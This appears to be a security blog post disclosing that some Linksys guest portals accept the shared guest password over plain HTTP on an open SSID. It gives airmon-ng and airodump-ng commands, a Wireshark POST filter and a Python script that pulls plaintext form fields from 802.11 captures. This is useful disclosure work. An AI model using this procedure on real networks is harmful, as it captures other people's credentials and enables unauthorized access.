For years there’s been a flaw in the way some Linksys access points facilitate access for guest users. A bit of research reveals complaints of this method dating back to 2013, and apparently the problem still hasn’t been fixed on some modern Linksys access points.
Nearly every access point on the market advertises a WPA2-PSK protected SSID for guest users to connect to. The administrator configures the pre-shared key and hands it to guest users, who then use it to authenticate to the AP, a process with which we're all familiar. The benefit of this is obvious: the pre-shared key itself is never sent over the air, the 4-way handshake only proves possession of it and derives per-session keys, and all of the guest's subsequent traffic to the AP is encrypted. (Well, at least as secure as WPA2 can be.)
Linksys, on some APs, has chosen to handle this a little differently. Rather than provide an SSID with WPA2-PSK encryption, the AP advertises an open, unencrypted SSID. When guests connect to this SSID, they’re offered a sign-in portal to provide a password, which is a pre-shared key that is shared among all guests. The problem with this implementation is that the web portal used to accept this key is not encrypted with either WPA2-PSK encryption (as the SSID is open and unencrypted) or HTTPS.
Other access points, including access points provided to Comcast Xfinity customers, also offer an unencrypted SSID that lands users on a web portal, but at least that portal is served over HTTPS (TLS), so no plain-text passwords are transmitted across the air.
Sniffing Unencrypted Passwords on the Air
Note: If you are unfamiliar with using airmon-ng and airodump-ng commands, you might want to check out my earlier article, which goes more in depth in regards to the syntax of those tools.
As you can imagine, since the wireless guest password is transmitted through the air unencrypted, it's very easy to sniff this traffic and gain free Internet access via the guest portal. The only hardware and software requirements are a wireless adapter capable of being put into monitor mode and the aircrack-ng suite of tools, which is installed by default in Kali Linux.
From within Kali we'll put our compatible wireless adapter into monitor mode.
airmon-ng start wlan0
We’ll then start airodump to identify our target SSID. The important pieces of data to gather are the channel on which the access point is operating, and the BSSID of the SSID being advertised. This information should be shown on the airodump output screen.
Once we've gathered the channel and the BSSID of the open SSID, we can begin sniffing traffic to and from that SSID. First, we'll want to make sure we're in root's working directory on our Kali machine. When we begin capturing data with airodump, several files will be created, including a packet capture file that we can analyze in Wireshark.
cd ~
airodump-ng -c 6 --bssid DE:AD:BE:EF:00:00 -w LinksysCapture wlan0mon
In this command the -c flag specifies the channel our target AP is operating on, the --bssid flag specifies the BSSID of the SSID we gathered above, and the -w flag provides a prefix for the output files.
Once this command is run we will be able to see the airodump output for only the SSID we specified. Under the STATION column, we'll be able to see when a station connects. When a station connects and enters the guest wireless password, we will be able to use Wireshark to extract it from the LinksysCapture-01.cap file that airodump creates for us.
Capturing the Password and Evaluating with Wireshark
At this point, it’s a waiting game, since we will have to wait for a valid user to connect to the insecure SSID, and enter the guest password. Once a user connects, we should be able to see their MAC address appear below the STATION column. The counter under the Frames column increments as they communicate with the SSID and frames are passed back and forth.
We can take a snapshot of the file as it is being captured by opening a new terminal and copying the existing .cap file to another .cap file. For example:
cp LinksysCapture-01.cap cap.cap
Taking a snapshot lets us evaluate the capture in Wireshark while leaving the initial capture running, just in case the station that connected didn't enter the correct password, or never attempted to enter one after discovering that the open SSID doesn't hand out free Internet on its own.
We will open the snapshot of our output, cap.cap, and use a display filter in Wireshark, easily entered by typing it in the filter bar above the packet list. This filter will show only HTTP POST requests, which is how the guest portal page submits the password to the Linksys AP, and since the SSID is open and the portal is plain HTTP, the form fields of that POST, password included, are readable in the packet bytes.
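For readers who prefer to script the analysis step rather than click through Wireshark (whose equivalent display filter is `http.request.method == "POST"`), the following is an added example written for this article; it is not Linksys's, aircrack-ng's or the original author's code. It parses an airodump-ng style .cap file (pcap with link type 105, raw 802.11 frames and no radiotap header, which is what airodump-ng writes by default; a link type 127 capture would need the radiotap header skipped first, which this example does not do), walks each data frame through LLC/SNAP, IPv4 and TCP, and pulls the form fields out of any plain-text HTTP POST. The sample capture is constructed inline: one frame carries the kind of POST an open guest portal sends, the other is the same station on a WPA2-PSK SSID with the Protected Frame bit set, so it yields nothing. The station MAC, router IP, URL path and the `guest_password` field name are assumptions for illustration, not something taken from a real Linksys portal.

```python
"""Extract plaintext HTTP POST form fields from an airodump-ng .cap file.

Added example for this article, not vendor or aircrack-ng code. The frames
in sample_capture() are constructed here; MAC addresses, IPs, URL path and
form field names are assumptions for illustration.
"""
import struct
from urllib.parse import parse_qs

LINKTYPE_IEEE802_11 = 105          # raw 802.11 frames, what airodump-ng writes
LLC_SNAP_IPV4 = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"


def _pcap_global_header(linktype):
    # magic, version 2.4, tz offset, sigfigs, snaplen, link type
    return struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)


def _pcap_record(frame):
    # ts_sec, ts_usec, captured length, original length
    return struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame


def build_data_frame(src, dst, bssid, payload, protected=False):
    """802.11 data frame from a station to its AP (ToDS=1, FromDS=0).

    With ToDS set the address order is addr1=BSSID, addr2=source station,
    addr3=destination. protected=True sets the Protected Frame bit that a
    WPA/WPA2 SSID puts on every data frame.
    """
    fc0 = 0x08                                    # type=data, subtype=0
    fc1 = 0x01 | (0x40 if protected else 0x00)    # ToDS | Protected Frame
    hdr = struct.pack("<BBH", fc0, fc1, 0) + bssid + src + dst + struct.pack("<H", 0)
    return hdr + payload


def build_ip_tcp(src_ip, dst_ip, sport, dport, data):
    """LLC/SNAP + IPv4 + TCP wrapper. Checksums are left zero; the parser does not verify them."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + data
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, src_ip, dst_ip)
    return LLC_SNAP_IPV4 + ip + tcp


def _post_from_frame(frame):
    """Return {station, request, fields} if this frame carries a readable HTTP POST."""
    if len(frame) < 24:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 2:          # only data frames carry IP traffic
        return None
    if fc1 & 0x40:                      # Protected Frame: WPA/WPA2 ciphertext, nothing to read
        return None
    hlen = 26 if fc0 & 0x80 else 24     # QoS data frames add a 2-byte QoS control field
    station = frame[10:16]              # addr2 = transmitter, the station on an upstream frame
    body = frame[hlen:]
    if body[:8] != LLC_SNAP_IPV4:
        return None
    ip = body[8:]
    if len(ip) < 20 or ip[9] != 6:      # protocol 6 = TCP
        return None
    tcp = ip[(ip[0] & 0xF) * 4:]
    if len(tcp) < 20:
        return None
    data = tcp[(tcp[12] >> 4) * 4:]
    if not data.startswith(b"POST "):
        return None
    head, _, form = data.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("ascii", "replace")
    fields = {k: v[0] for k, v in parse_qs(form.decode("utf-8", "replace")).items()}
    return {"station": station.hex(":"), "request": request_line, "fields": fields}


def extract_post_credentials(pcap):
    """Walk every record in a link-type-105 pcap and collect plaintext POST submissions."""
    if struct.unpack("<I", pcap[:4])[0] != 0xA1B2C3D4:
        raise ValueError("not a little-endian pcap file")
    if struct.unpack("<I", pcap[20:24])[0] != LINKTYPE_IEEE802_11:
        raise ValueError("expected raw 802.11 frames (link type 105)")
    hits, off = [], 24
    while off + 16 <= len(pcap):
        incl = struct.unpack("<IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        hit = _post_from_frame(frame)
        if hit:
            hits.append(hit)
    return hits


def sample_capture():
    """Constructed capture: one open-SSID portal login, one WPA2-protected frame."""
    sta = bytes.fromhex("001122334455")                      # assumed guest station
    bssid = bytes.fromhex("deadbeef0000")                    # BSSID from the airodump command above
    body = b"guest_password=BeMyGuest&submit=1"              # assumed portal form fields
    post = (b"POST /guest_login.cgi HTTP/1.1\r\nHost: 192.168.3.1\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: %d\r\n\r\n" % len(body)) + body
    open_frame = build_data_frame(sta, bssid, bssid,
                                  build_ip_tcp(bytes([192, 168, 3, 100]), bytes([192, 168, 3, 1]),
                                               40000, 80, post))
    # Same station on a WPA2-PSK SSID: Protected bit set, payload is opaque CCMP ciphertext.
    wpa2_frame = build_data_frame(sta, bssid, bssid, bytes(range(72)), protected=True)
    return (_pcap_global_header(LINKTYPE_IEEE802_11)
            + _pcap_record(open_frame) + _pcap_record(wpa2_frame))


if __name__ == "__main__":
    for hit in extract_post_credentials(sample_capture()):
        print(hit["station"], hit["request"], hit["fields"])
```

To run it against a real snapshot, read the file with `open("cap.cap", "rb").read()` and pass the bytes to `extract_post_credentials`; only the open-SSID frame produces a result, which is exactly the difference between the Linksys design and a WPA2-PSK guest network.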
If you are using the “Guest Access Portal” feature on a Linksys AP that handles guest logins in this way, you may want to consider replacing that AP with a more secure AP, or at least disabling the feature if you don’t want people getting a free ride on your Internet connection.